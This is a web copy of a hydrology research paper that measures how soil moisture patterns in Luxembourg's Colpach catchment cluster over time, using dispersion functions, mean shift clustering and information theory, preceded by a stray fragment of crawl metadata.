] | {"ft_lang_label":"__label__en","ft_lang_prob":0.6416701,"math_prob":0.48063302,"size":7594,"snap":"2020-34-2020-40","text_gpt3_token_len":1820,"char_repetition_ratio":0.11291172,"word_repetition_ratio":0.0069747167,"special_character_ratio":0.23821437,"punctuation_ratio":0.1554054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95719725,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-19T19:10:27Z\",\"WARC-Record-ID\":\"<urn:uuid:d430c331-0061-43f7-97f8-7b555e53c874>\",\"Content-Length\":\"128785\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:74ce07aa-b73a-4087-93f4-50043fe2dc1d>\",\"WARC-Concurrent-To\":\"<urn:uuid:5e9ee45b-2aaa-4b96-b798-5fea7a814655>\",\"WARC-IP-Address\":\"23.194.130.155\",\"WARC-Target-URI\":\"https://www.geeksforgeeks.org/mapreduce-program-finding-the-average-age-of-male-and-female-died-in-titanic-disaster/?ref=rp\",\"WARC-Payload-Digest\":\"sha1:3ZXESWT7COAPAAFA5EM7QPTTCCDO3PNC\",\"WARC-Block-Digest\":\"sha1:VUJNYYDZGM6TNGX5JQXRD3DJBSCNFOMZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400192783.34_warc_CC-MAIN-20200919173334-20200919203334-00035.warc.gz\"}"} |
https://hess.copernicus.org/articles/24/2633/2020/ | [
"https://doi.org/10.5194/hess-24-2633-2020\nhttps://doi.org/10.5194/hess-24-2633-2020",
null,
"# Soil moisture: variable in space but redundant in time\n\nMirko Mälicke, Sibylle K. Hassler, Theresa Blume, Markus Weiler, and Erwin Zehe\nAbstract\n\nSoil moisture at the catchment scale exhibits a huge spatial variability. This suggests that even a large amount of observation points would not be able to capture soil moisture variability.\n\nWe present a measure to capture the spatial dissimilarity and its change over time. Statistical dispersion among observation points is related to their distance to describe spatial patterns. We analyzed the temporal evolution and emergence of these patterns and used the mean shift clustering algorithm to identify and analyze clusters. We found that soil moisture observations from the 19.4 km2 Colpach catchment in Luxembourg cluster in two fundamentally different states. On the one hand, we found rainfall-driven data clusters, usually characterized by strong relationships between dispersion and distance. Their spatial extent roughly matches the average hillslope length in the study area of about 500 m. On the other hand, we found clusters covering the vegetation period. In drying and then dry soil conditions there is no particular spatial dependence in soil moisture patterns, and the values are highly similar beyond hillslope scale.\n\nBy combining uncertainty propagation with information theory, we were able to calculate the information content of spatial similarity with respect to measurement uncertainty (when are patterns different outside of uncertainty margins?). We were able to prove that the spatial information contained in soil moisture observations is highly redundant (differences in spatial patterns over time are within the error margins). Thus, they can be compressed (all cluster members can be substituted by one representative member) to only a fragment of the original data volume without significant information loss.\n\nOur most interesting finding is that even a few soil moisture time series bear a considerable amount of information about dynamic changes in soil moisture. We argue that distributed soil moisture sampling reflects an organized catchment state, where soil moisture variability is not random. Thus, only a small amount of observation points is necessary to capture soil moisture dynamics.\n\nShare\nDates\n1 Introduction\n\nAlthough soil water is by far the smallest freshwater stock on earth, it plays a key role in the functioning of terrestrial ecosystems. Soil moisture controls (preferential) infiltration and runoff generation and is a limiting factor for vegetation growth. Plant-available soil water affects the Bowen ratio, i.e., the partitioning of net radiation energy in latent and sensible heat, and last but not least it is an important control for soil respiration and related trace gas emissions. Technologies and experimental strategies to observe soil water dynamics across scales have been at the core of the hydrological research agenda for more than 20 years . Since these early studies published by Topp, spatially and temporally distributed time domain reflectometry (TDR) and frequency domain reflectometry (FDR) measurements have been widely used to characterize soil moisture dynamics at the transect (e.g., Blume et al.2009), hillslope (e.g., Starr and Timlin2004; Brocca et al.2007) and catchment scale (e.g., Western et al.2004; Bronstert et al.2012). 
A common conclusion for the catchment scale is that soil moisture exhibits pronounced spatial variability and that distributed point sampling often does not yield representative data for the catchment (see, e.g., the numerous studies discussed in the review literature cited below). Although large spatial variability seems to be a generic feature of soil moisture, there is also evidence that ranks of distributed soil moisture observations are largely stable in time, as observed at the plot, hillslope, and even catchment scale. This rank stability, which is also often referred to as temporal stability, can, for instance, be used to improve sensor networks (e.g., Heathman et al., 2009) or to select the most representative observation site in terms of soil moisture dynamics (e.g., Teuling et al., 2006). In both cases rank stability assumes some kind of organization in the catchment, otherwise this representativity would not be observed.\n\nSoil moisture dynamics have been the subject of numerous review works. More specifically, the temporal stability of soil moisture was reviewed by Vanderlinden et al. (2012). The authors analyzed a large number of studies with respect to the controls on time stability of soil water content (TS SWC), yet “the basic question about TS SWC and its controls remain unanswered. Moreover, the evidence found in literature with respect to TS SWC controls remains contradictory” (Vanderlinden et al., 2012, p. 2, l. 2 ff.). We want to contribute by proposing a method that helps to understand how and when spatial soil moisture patterns are persistent.\n\nSoil moisture responds to two main forcing regimes, namely rainfall-driven wetting or radiation-driven drying. The related controlling factors and processes differ strongly and operate at different spatial and temporal scales, and the soil moisture pattern thus reflects the multitude of these influences. Hence, we hypothesize that periods in which different controlling factors were dominant are reflected in fundamentally different soil moisture patterns. This can manifest itself in changes in the spatial covariance structure, either in the form of changing nugget-to-sill ratios (spatially explained variance) or state-dependent variogram ranges (spatial extent of correlation). In a homogeneous, flat and non-vegetated landscape the soil moisture pattern shortly after a rainfall event would be the imprint of the precipitation pattern and provide predictive information about its spatial covariance. In contrast, in a heterogeneous landscape driven by spatially uniform block rain events, the spatial pattern of soil moisture would be a largely stable imprint of different landscape properties controlling throughfall, infiltration as well as vertical and lateral soil water redistribution. Without further forcing, the spatial pattern will gradually dissipate due to soil water potential depletion and by lateral soil water flows. We therefore hypothesize that differences in soil moisture (across space) are higher shortly after a rainfall event and are dissipated afterwards.\n\nLandscape heterogeneity is thus a prerequisite for temporally persistent spatial patterns found in a set of soil moisture time series. While most catchments are strongly heterogeneous, it is striking how spatially organized they are. Spatial organization manifests for instance through systematic and structured patterns of catchment properties, such as a catena. This might naturally lead to a systematic variability of those processes controlling wetting and drying of the soil.
One approach to diagnose and model systematic variability is based on the covariance between observations in relation to their separating distance and on geostatistical interpolation or simulation methods.\n\nA spatial covariance function describes how the linear statistical dependence of observations declines with increasing separating distance up to the distance of statistical independence. This is often expressed as an experimental variogram. Geostatistics relies on several assumptions, such as second-order stationarity, which are ultimately important for interpolation. Due to the above-mentioned dynamic nature of soil moisture observations, the most promising avenue for interpolation would be a spatio-temporal geostatistical modeling of our data.\n\nHowever, here we take a different avenue, as we do not intend to interpolate. One of our goals is to detect dynamic changes in the spatial soil moisture pattern. To this end we relate the statistical dispersion of soil moisture observations to their separating distance to characterize how their similarity and predictive information decline with this distance (see Sect. 2). More specifically, we analyze temporal changes in the spatial dispersion of distributed soil moisture data and hypothesize that a grouping of the data is possible solely based on the changes in spatial dispersion. We want to find out whether typical patterns emerge in time, how those relate to the different forcing regimes and whether those patterns are recurrent in time. The latter is an indicator of predictability and (self-)organization in dynamic systems.\n\nIt has been argued that spatial organization manifests through similar hydrological functioning. This is in line with ideas on catchment classification and the early idea of a geomorphological unit hydrograph. Recently, this idea was corroborated by showing that hydrological similarity of discharge time series implies that they are redundant. Redundancy in our context means that new observations (over time) do not add significant new information to the data set of spatial dispersion. Thus, they can be compressed without information loss. This combination of compression rate and information loss is understood to be a measure of spatial organization in our work. More specifically, it was shown that a set of 105 hillslope models yielded, despite their strong differences in topography, a strongly redundant runoff response. Using Shannon entropy (Shannon, 1948), it was shown that the ensemble could be compressed to a set of six to eight typical hillslopes without performance loss. Here we adopt this idea and investigate the redundancy of patterns in spatially distributed soil moisture data along with their compressibility.\n\nThe core objective of this study is to provide evidence that distributed soil moisture time series provide, despite their strong spatial variability, representative information on soil moisture dynamics. More specifically, we test the following hypotheses.\n\n• H1: radiation-driven drying and rainfall-driven wetting leave different fingerprints in the soil moisture pattern.\n\n• H2: both forcing regimes and their seasonal variability may be identified through temporal clustering of dispersion functions.\n\n• H3: spatial dispersion is more pronounced during and shortly after rainfall-driven wetting conditions.\n\n• H4: soil moisture time series are redundant, which implies they are compressible without information loss.
However, the degree of compressibility is changing over time.\n\nWe test these hypotheses using a distributed soil moisture data set collected in the Colpach catchment in Luxembourg. In Sect. 2 we give an overview of the study site and our method. The results section consists of three parts: spatial dispersion functions, temporal patterns in their emergence and some insights into the generalization (or compressibility) of these functions, followed by a discussion and summary.\n\n2 Methods\n\n## 2.1 Study area and soil moisture data set\n\nWe base our analyses on the CAOS data set, which was collected in the Attert experimental watershed between 2012 and 2017. The Attert catchment is situated in western Luxembourg and Belgium (Fig. 1). Mean monthly temperatures range from 18 °C in July to 0 °C in January. Mean annual precipitation is approximately 850 mm. The catchment covers three geological formations, Devonian schists of the Ardennes massif in the north-west, a mixture of Triassic sandy marls in the center and a small area on Luxembourg Sandstone on the southern catchment border. The respective soils in the three areas are haplic Cambisols in the schist, different types of Stagnosols in the marls area and Arenosols in the sandstone. The distinct differences in geology are also reflected in topography and land use. In the schist area, land use is mainly forest on steep slopes of the valleys, which intersect plateaus that are used for agriculture and pastures. The marls area has very gentle slopes and is mainly used for pastures and agriculture, while the sandstone area is forested on steep topography.
null,
"Figure 1Attert experimental catchment in Luxembourg and Belgium. The purple dots show the sensor cluster stations installed during the CAOS project. Here we focus on those cluster stations within the Colpach catchment. Figure adapted after .\n\nThe experimental design is based on spatially distributed, clustered point measurements within replicated hillslopes. Typical hillslope lengths vary between 400 and 600 m, showing maximum elevations of 50 to 100 m above stream level. For further details on the hillslopes, we refer the reader to Fig. 6a in and a detailed description in Sect. 3.1.1 of the same publication. Sensor clusters were installed on hillslopes at the top, midslope and hill foot sectors along the anticipated flow paths. Within each of those clusters, soil moisture was recorded in three profiles at 10, 30 and 50 cm depth using Decagon 5TE sensors. While the entire design was stratified to sample different geological settings (schist, marls, sandstone), different aspects and land use (deciduous forest and pasture), we focus here on those sensors installed in the Colpach catchment. In total we used 19 sensor cluster locations and thus 57 soil moisture profiles consisting of 171 time series.",
null,
"Figure 2Soil moisture data overview. Soil moisture observations in 10 cm (a), 30 cm (b) and 50 cm (c).\n\nSoil moisture in the 19.4 km2 Colpach catchment exhibits high but temporally persistent spatial variability (Fig. 2). For each point in time a wide range of water content values can be observed across the catchment. The range of soil moisture observations is generally wider in winter than in summer. From visual inspection it seems that the heterogeneity in observations is not purely random but systematic, as the measurements are rank stable over long periods. One has to note that the different cluster locations differ in aspect, slope and land use. From the data shown in Fig. 2, two sensors have been removed. Both measured in 50 cm and can be seen in the figure at the very bottom. Both recorded values close to or even below 0.1 cm3 cm−3 for the whole period of 4 years. Additionally, the plateaus lasting for a couple of days at constant 0.5 cm3 cm−3 in 50 and 30 cm were removed.\n\n## 2.2 Dispersion of soil moisture observations as a function of their distance\n\nWe focus on spatial patterns of soil moisture and how they change over time. For our analysis the data set was aggregated to mean daily soil moisture values θ. Each time series is further aggregated using a moving window of 1 month as described by Eq. (1).\n\n$\\begin{array}{}\\text{(1)}& {z}_{x}\\left(t\\right)=\\frac{\\sum _{t}^{t+b}{\\mathit{\\theta }}_{x}}{b}\\end{array}$\n\nThis is calculated for each observation location x and time step t=1, 2, …, (Lb), with a time series length of L in days and a window size of b=301.\n\nTo estimate the spatial dependence structure between observations, we relate their pairwise separation distance to a measure of pairwise similarity. Here, we further define the statistical spatial dispersion as a measure of spatial similarity. We compare the empirical distribution of pairwise value differences at different distances. Statistically, a more dispersed empirical distribution is less well described by its mean value. Thus, observations taken at a specific distance are more similar in value if they are less dispersed.\n\nTo estimate the dispersion, we use the Cressie–Hawkins estimator . This estimator is more robust to extreme values and the contained power transformation handles skewed data better than estimators based on the arithmetic mean . The estimator is given by Eq. (2):\n\n$\\begin{array}{}\\text{(2)}& \\begin{array}{rl}{a}_{t}\\left(h\\right)=& \\frac{\\mathrm{1}}{\\mathrm{2}}{\\left(\\frac{\\mathrm{1}}{N\\left(h\\right)}\\sum _{i,j}\\sqrt{|{z}_{t}\\left({x}_{i}\\right)-{z}_{t}\\left({x}_{j}\\right)|}\\right)}^{\\mathrm{4}}\\\\ & {\\left(\\mathrm{0.457}+\\frac{\\mathrm{0.494}}{N\\left(h\\right)}+\\frac{\\mathrm{0.045}}{{N}^{\\mathrm{2}}\\left(h\\right)}\\right)}^{-\\mathrm{1}},\\end{array}\\end{array}$\n\nfor each moving window position t with zt(xi,j) given by Eq. (1) for each pair of observation locations xi, xj. h is the separating distance lag between these point pairs and N(h) the number of point pairs formed at the given lag h. Ten classes were formed with a maximum separation distance of 1200 m2. The lag classes are not equidistant, but with a fixed N(h) for all classes. This is further discussed in Sect. 2.3.\n\n## 2.3 Clustering of dispersion functions\n\nWe analyzed how and whether meaningful spatial dispersion functions emerge and whether those converge into stable configurations. 
\n\n## 2.3 Clustering of dispersion functions\n\nWe analyzed how and whether meaningful spatial dispersion functions emerge and whether those converge into stable configurations. To tackle the hypotheses formulated in the introduction, a clustering is applied to the dispersion functions derived for each window. The clustering algorithm should form groups of functions that are more similar to each other than to members of other clusters. The similarity between two dispersion functions is calculated by the Euclidean vector distance between the dispersion values forming the function. This distance is defined by Eq. (3):\n\n$$d(\mathbf{u},\mathbf{v}) = \sqrt{(\mathbf{u}-\mathbf{v})^{2}} \qquad \text{(3)}$$\n\nwith u, v being two dispersion function vectors. This is the Euclidean distance of two points in the (higher-dimensional) value space of the dispersion function's distance lags. Two identical dispersion functions are represented by the same point in this value space, and hence their distance is zero. Thus, distance lags are not equidistant, as this could lead to empty lag classes. Empty lag classes result in an undefined position in the value space, which has to be avoided. The clustering algorithm cannot use the number of clusters as a parameter, as this can hardly be determined a priori. One clustering algorithm meeting these requirements is the mean shift algorithm. The code implementation used here follows a standard variant of mean shift. A detailed description of the mean shift algorithm can be found in the Appendix (see Sect. A).\n\n## 2.4 Cluster compression based on the cluster centroids\n\nThe next step is to generate a representative dispersion function for each cluster. The straightforward representative function is the cluster centroid (the dispersion function closest to the point of highest cluster member density; see Sect. A for a detailed explanation). All dispersion functions are calculated with the same parameters, including the maximum separating distance of 1200 m. At larger lags we found instances of declining dispersion values, because we then paired points located on different hillslopes but otherwise in similar landscape units (i.e., same hillslope position or land use). To facilitate the comparison of the dispersion functions we decided to monotonize them. In geostatistics this is usually done through fitting of a theoretical variogram model to the experimental variogram, which ensures monotony and positive definiteness. Here we do not force a specific shape by fitting a model function. Instead we monotonize the cluster centroid using the PAVA algorithm. This way the final compressed dispersion functions are monotonically increasing while still reflecting the shape properties of the cluster members. If dispersion functions are monotonically increasing, they also provide information about the characteristic length of the soil moisture pattern. Similarly to the semi-variogram in geostatistics, this characteristic length corresponds to the lag distance where the dispersion function reaches its first local maximum.
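\n\nAs an illustration of the clustering and monotonization steps described above, a sketch using scikit-learn (one possible implementation; the library actually used in the study is not identifiable from this excerpt, and disp is a hypothetical array holding one dispersion function per moving-window position):\n\n```python
import numpy as np
from sklearn.cluster import MeanShift
from sklearn.isotonic import IsotonicRegression

# disp: shape (n_windows, n_lag_classes), one dispersion function per row
ms = MeanShift().fit(disp)               # groups functions by Euclidean distance, Eq. (3)
lag_centers = np.arange(disp.shape[1])   # placeholder for the actual lag-class centers

# monotonically increasing representative function per cluster (PAVA)
iso = IsotonicRegression(increasing=True)
representatives = [iso.fit_transform(lag_centers, center)
                   for center in ms.cluster_centers_]  # converged kernel means
```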
\n\nWe suggest that the number of clusters needed to represent all observed spatial dispersion functions over a calendar year can be used as a measure of spatial organization (fewer clusters needed means a higher degree of organization, because dispersion functions are redundant in time). Additionally, it is insightful to judge the information loss that goes along with this compression, as a high compression with little information loss is understood as a manifestation of spatial and temporal organization of soil moisture dynamics.\n\nIn line with this reasoning we use the Shannon entropy as a measure of compression without information loss. It requires treatment of the clusters as discrete probability density functions, which in turn implies a careful selection of an appropriate classification of the data. We use the uncertainty in the dispersion function as a minimal class size for this classification, as described in Sect. 2.5.1.\n\n## 2.5 Uncertainty propagation and compression quality\n\n### 2.5.1 Uncertainty propagation\n\nSoil moisture measurements have a considerable measurement uncertainty of 0.01–0.03 cm³ cm⁻³ as reported by manufacturers. For our uncertainty propagation we assume an absolute uncertainty/measurement error Δθ of 0.02 cm³ cm⁻³.\n\nNext we propagate these uncertainties into the dispersion functions and the distances among those. As we assume the measurement uncertainties to be statistically independent, we use Gaussian uncertainty propagation to calculate error bands/margins. In a general form, for any function f(z) and an absolute error Δz, the propagated error Δf can be calculated. In our case z is itself a function of x, the observation location, and the general form is given by Eq. (4):\n\n$$\Delta f = \sqrt{\sum_{i=1}^{N}\left(\frac{\partial f}{\partial z(x_i)}\,\Delta z(x_i)\right)^{2}} \qquad \text{(4)}$$\n\nTo apply Eq. (4) to our method, the measurement uncertainty Δθ is propagated into the dispersion estimator given by Eq. (2). The dispersion estimator is derived with respect to z(x) and, following Eq. (1), the uncertainty in z(x) is denoted as Δz = Δθ = 0.02 cm³ cm⁻³. Then, with a given Δz, we can propagate the uncertainty into the dispersion function. As the dispersion function is a function of the spatial lag h, we need to propagate the uncertainty Δa (uncertainty of the dispersion estimator) for each value of h. At the same time, following Eq. (2), for each h, z(x_i) − z(x_i + h) is a fixed set of point pairs. Instead of propagating the uncertainty through Eq. (2), we can substitute z(x_i) − z(x_i + h) by δ, the pairwise differences, for each value of h. The uncertainty Δδ is given by Eq. (5):\n\n$$\Delta\delta = \sqrt{\Delta z_i^{2} + \Delta z_{i+h}^{2}} = \sqrt{2}\,\Delta z \qquad \text{(5)}$$\n\nThe uncertainty of the dispersion, Δa, is then defined by Eq. (6):\n\n$$\Delta a = \frac{\partial a}{\partial \delta}\,\Delta\delta = 2c\left(\frac{1}{N}\sum_{i=1}^{N}|\delta_i|^{\frac{1}{2}}\right)^{3} \cdot \frac{1}{N}\left(\sum_{i=1}^{N}|\delta_i|^{-1}\right)^{\frac{1}{2}} \cdot \Delta\delta \qquad \text{(6)}$$
\n\nwhere the factors from Eq. (2) that stay constant in the derivative are denoted as c and defined in Eq. (7). In line with Eq. (2), N is the number of observation pairs available for a given lag class h and therefore constant for a single calculation. Δδ and δ are the substitutes for z, as described above (see Eq. 5).\n\n$$c = \frac{1}{2}\cdot\left(0.457 + \frac{1}{N} + \frac{0.045}{N^{2}}\right)^{-1} \qquad \text{(7)}$$\n\nThe last step is to propagate the uncertainty into the distance function as defined in Eq. (3). The Euclidean distance is used as a measure of proximity by mean shift, as it groups dispersion functions at short distances together (for more details, see Sect. A). At the same time, we use the uncertainty propagated into the Euclidean distance between two dispersion functions to assess compression quality (as further described in Sect. 2.5.2). Following Eq. (4), the propagated uncertainty Δd can be calculated from the derivative of Eq. (3) with respect to each of the vectors, multiplied by the corresponding value of Δa, which results in Eq. (8):\n\n$$\Delta d_{\mathbf{u},\mathbf{v}} = \sqrt{\left(\frac{\partial d}{\partial \mathbf{u}}\,\Delta\mathbf{u}\right)^{2} + \left(\frac{\partial d}{\partial \mathbf{v}}\,\Delta\mathbf{v}\right)^{2}} = \frac{1}{2\sqrt{\sum_{i=1}^{n}(u_i - v_i)^{2}}}\,\sqrt{\sum_{i=1}^{n}\left(\left(2\,|u_i - v_i|\,\Delta u_i\right)^{2} + \left(2\,|u_i - v_i|\,\Delta v_i\right)^{2}\right)} \qquad \text{(8)}$$\n\nwhere u, v are two spatial dispersion function vectors as defined and used in Eq. (3). Δu, Δv are the vectors of uncertainties for u, v, where Δv_i is the uncertainty propagated into the ith lag class as shown in Eq. (6). n is the number of lag classes and thus the length of each of the vectors u, v, Δu, Δv.\n\nEquation (8) is applied to all possible combinations of dispersion functions u, v to get all possible uncertainties in dispersion function distances.
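\n\nFor illustration, Eqs. (5)–(7) for a single lag class could be coded as follows (a sketch with hypothetical variable names; delta must not contain zeros because of the |δ|⁻¹ term in Eq. 6):\n\n```python
import numpy as np

def dispersion_uncertainty(delta, dz=0.02):
    # propagate the measurement uncertainty dz into the dispersion of one lag
    # class: Delta-delta from Eq. (5), c from Eq. (7), Delta-a from Eq. (6)
    d = np.abs(np.asarray(delta, dtype=float))    # pairwise differences delta_i
    n = d.size
    d_delta = np.sqrt(2.0) * dz                   # Eq. (5)
    c = 0.5 / (0.457 + 1.0 / n + 0.045 / n ** 2)  # Eq. (7), as printed
    return (2.0 * c * np.sqrt(d).mean() ** 3      # Eq. (6)
            * (1.0 / n) * np.sqrt((1.0 / d).sum())
            * d_delta)
```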
H is calculated for each depth in each year individually to compare the information content across years and depths. Note that the term bin is also used in the literature to refer to the binning of pairwise data, e.g., in geostatistics. For this kind of binning, although technically the same thing, we use the term lag classes here to distinguish it from the binning shown in Eq. (9). Thus, when we write bin or binning, we refer to the classification of distances between dispersion functions, not observation points.

To ensure comparability, we use one binning for all calculations of H (across years and depths). To achieve this, all pairwise distances between all spatial dispersion functions of all 4 years in all three depths are calculated. The discrete frequency distribution is formed from 0 up to the global maximum distance (between two dispersion functions) calculated using Eq. (3). The bins are formed equidistantly, with a width set to the maximum function distance that still lies within the error margins calculated using Eq. (8). Thus, the information content of the spatial heterogeneity is calculated with respect to the expected uncertainties. This way we can be sure to distinguish exclusively those spatial dispersion functions that lie outside of the error margins.

The Kullback–Leibler divergence is a measure of the difference between two empirical, discrete probability distributions. Usually, one distribution is considered to be the population and the other one a sample from it. The Kullback–Leibler divergence $D_{\mathrm{KL}}$ then quantifies the uncertainty introduced (e.g., in a statistical model) by using the sample as a substitute for the population.

We use the Kullback–Leibler divergence to measure and quantify the information loss due to compression. To compress the series of dispersion functions, each cluster member is expressed by its centroid function. Now, we need to calculate the amount of information lost in this process. To calculate the mean information content of the compressed series, each cluster member is substituted by the respective cluster centroid. This substitution is obviously not a compression in a technical sense, but it is necessary to calculate the Kullback–Leibler divergence. Then a frequency distribution for the compressed series X and the uncompressed series Y can be calculated. The Kullback–Leibler divergence $D_{\mathrm{KL}}$ of X, Y is given in Eq. (10):

$$D_{\mathrm{KL}}(X, Y) = H(X\,\|\,Y) - H(Y), \tag{10}$$

where $H(X\,\|\,Y)$ is the cross entropy of X and Y, defined by Eq. (11):

$$H(X\,\|\,Y) = -\sum_{x\in X} p(x)\cdot\log_2 p(y), \tag{11}$$

where p(x) is the empirical probability of the frequency distribution X and p(y) that of Y, respectively.
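A hedged sketch of Eqs. (10) and (11), self-contained and with illustrative names; the inputs are the binned distance series, where in the compressed series every cluster member has been substituted by its cluster centroid:

```python
import numpy as np


def information_loss(compressed, uncompressed, bin_edges):
    """Information loss due to compression, D_KL (Eqs. 10-11).

    compressed:   distances after substituting each cluster member
                  by its cluster centroid
    uncompressed: distances of the original series of dispersion functions
    """
    px = np.histogram(compressed, bins=bin_edges)[0].astype(float)
    py = np.histogram(uncompressed, bins=bin_edges)[0].astype(float)
    px, py = px / px.sum(), py / py.sum()
    mask = (px > 0) & (py > 0)          # restrict to bins with support in both
    cross_entropy = -np.sum(px[mask] * np.log2(py[mask]))      # Eq. (11)
    h_y = -np.sum(py[py > 0] * np.log2(py[py > 0]))            # H(Y), Eq. (9)
    return cross_entropy - h_y                                 # Eq. (10)
```

Using one fixed `bin_edges` array for all years and depths keeps the resulting values comparable, as argued above.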
3 Results

## 3.1 Dispersion functions over time

Figure 3a shows the spatial dispersion functions for all moving-window positions in 2016 for the 30 cm sensors. The position of the moving window in time can be retraced by the line color: darker red means a later Julian day. Each spatial dispersion function relates the dispersion of all pairwise observations to their separating distance in the corresponding lag class. Dispersion increases with separating distance, as small values correspond to observations with similar values, while large values suggest the opposite. As expected, the dispersion is thus a suitable metric for the similarity and dependency of observations.
"Figure 3Spatial dispersion functions in 30 cm for 2016 based on a window size of 30 d. (a) Spatial dispersion function for each position of the moving window. The red color saturation indicates the window position. The darker the red, the later in the year. (b) The same dispersion functions as presented in (a). Here the color indicates cluster membership as identified by the mean shift algorithm. (c) Compressed spatial dispersion information represented by corrected cluster centroids. The colors match the clusters as presented in (b). (d) Soil moisture time series of 2016 in 30 cm depth. The colors identify the cluster membership of the spatial dispersion function of the current window location and match the colors in (b) and (c). The bars on the top show the daily precipitation sums. The solid blue line is the cumulative daily precipitation sum and the red line the cumulative sum of all mean daily temperatures > 5 C. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum.\n\nThe spatial dispersion functions take several distinct shapes, with each of these shapes occurring during a certain period in time. More specifically, from Fig. 3a one can identify groups of functions of similar reds plotting close to each other. Dispersion functions of similar red saturation, which reflects proximity in time, are also similar in shape, and this in turn reflects similar spatial patterns. Similar dispersion functions were grouped using the mean shift clustering algorithm (Fig. 3b); here, the color indicates the cluster membership.\n\nTo provide further insight into the temporal occurrence of cluster members, we colored the soil moisture time series according to the color codes of the identified clusters (Fig. 3d). The blue parts of the soil moisture time series were classified into Cluster no. 1, while the orange part was classified into Cluster no. 2. Note that cluster memberships are constant for long periods of time, which means that the soil moisture patterns are also persistent over these periods. Exact cluster lifespans can be found in Table B1. We could identify four clusters in 30 cm, with the orange cluster roughly occurring during the vegetation period and the other three the remaining time of the year. As new observations did not change the patterns during these periods, they were redundant in time.\n\nAs the spatial dispersion functions in the presented example are redundant in time, we compressed the information by replacing the dispersion function within one cluster by the cluster centroid. All four representative functions shown in Fig. 3c exhibit increasing dispersion with separating distance. For the blue and green clusters this happens step-wise at a characteristic distance of 500 m. That reminds us of a Gaussian variogram, which can also show a step-wise characteristic. The small grey cluster shows an increase at 500 and another one at 1000 m separating distance. In contrast, the orange cluster, however, shows only a gentle increase with distance.\n\nIn the vegetation period observations are similar even at large separating distances. Interestingly, dispersion functions in the orange cluster start with small values that only gently increase with separating distance. That means soil moisture becomes more homogeneous. Outside of the vegetation period, different spatial patterns can be observed, with increasing dissimilarity with separating distances. 
The part of the blue cluster overlapping with the vegetation period still shows higher soil moisture values. The transition to the orange cluster sets in as the soil moisture drops (Fig. 3d). This suggests that vegetation influences, such as root water uptake, smooth out variability in soil water content, leading to a more homogeneous pattern in space, as further discussed in Sect. 4.3.

## 3.2 Dispersion time series as a function of depth

Figure 4 shows the time series of the dispersion functions for all depths. Note that the coloring between the sub-figures is arbitrary, due to mean shift, which means that, e.g., the orange clusters in the three panels do not correspond to each other.
"Figure 4Soil moisture time series of 2016 in all three depths with respective cluster centroids. The three rows show the data from 10 cm (a), 30 cm (b) and 50 cm (c). The colors indicate the cluster membership of the corresponding dispersion function of the respective window position. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum. The cluster centroids for each depth are shown in (d–f).\n\nIn comparison to the dispersion functions in 30 cm (Fig. 4b) the soil moisture signal in 10 cm (Fig. 4a) is more variable in time. A look at the centroid of the orange cluster (Fig. 4d) reveals a higher spatial heterogeneity in winter and spring at large separating distances. At the same time the observations get spatially more homogeneous in summer, particularly when the blue cluster emerges; i.e., the dispersion at large lags decreases significantly. We can still find a summer-recession cluster in 10 cm, but compared to the depth of 30 cm we also find this spatial footprint of continuous drying earlier in the year around May. This is likely due to a higher sensitivity to rising temperatures. Note that during May there was only little rainfall and the soil moisture is already declining. This blue cluster shows very small dispersion values for all separating distance classes (Fig. 4d), just as the orange cluster in 30 cm depth.\n\nThe green clusters emerge with strong rainfall events after longer previous dry spells (Fig. 4a and d). We would have expected a third occurrence at the beginning of August, but the soil may already be too dry to bear a detectable dependency on separating distance (remember that the blue cluster does not show increasing dispersion with distance).\n\nObservations at 50 cm depth show a clear spatial dependency throughout the whole year. We cannot identify a summer cluster, mean shift yielded two clusters and rainfall forcing does not have a clear influence on their occurrence or transition. The two 50 cm dispersion functions (Fig. 4f) show a clear dependence on distance, but they differ in their dispersion value at large lags. At 10 and 30 cm we found dispersion functions of fundamentally different shapes, like the flat, blue function (Fig. 4,d) or the step-wise blue and green functions (Fig. 4e). At 50 cm depth the characteristic length is 500 m and the blue cluster persists throughout most of the year (282 d; see Table B1). The orange cluster occurs during the cool and wet start of the year, showing a larger dispersion and thus stronger dissimilarity at larger lags (Fig. 4f). Interestingly this cluster occurs again in early June after an intense rainfall period. However, a similar rainfall period in August does not trigger the emergence of this orange cluster as the topsoil above 50 cm is so dry, so that even this strong wetting signal does not reach the depth of 50 cm (Fig. 4c). This behavior reveals the low-pass behavior of the topsoil, which causes a strong decoupling of the soil moisture pattern at 50 cm depth from event-scale changes.\n\n## 3.3 Recurring spatial dispersion over the years\n\nTable 1 summarizes the most important features of the clustering for all observation depths. Soil moisture patterns and their clustering appear generally to be clearer for 2015 and 2016. The vegetation period is more often characterized by a typical cluster and dispersion functions more often reveal a clear spatial dependency. 
In some cases (10 cm, 2013 and 2014) no spatial dependency of the dispersion functions could be observed throughout the whole year. Fewer clusters were formed in 2015 and 2016. Note that annual rainfall sums were higher in 2013 and 2014, while 2015 and 2016 had significantly more precipitation in the first half of the year, followed by a dry summer (compared to 2013 and 2014).

Table 1. Qualitative description of method success in all years and depths. The results from years other than 2016 and all depths were inspected visually and are summarized here for the sake of completeness. The first three columns identify the year, sensor depth and number of clusters found by mean shift. The remaining three columns state whether specific features existed in the given result. Vegetation period: was the vegetation period characterized by a single cluster, or by two? Spatial structure: does a dependency of dispersion on distance exist outside the vegetation period? Rainfall transition: were cluster transitions accompanied by a rainfall event in close (temporal) proximity? This feature is marked "yes" if it was more often the case than not.
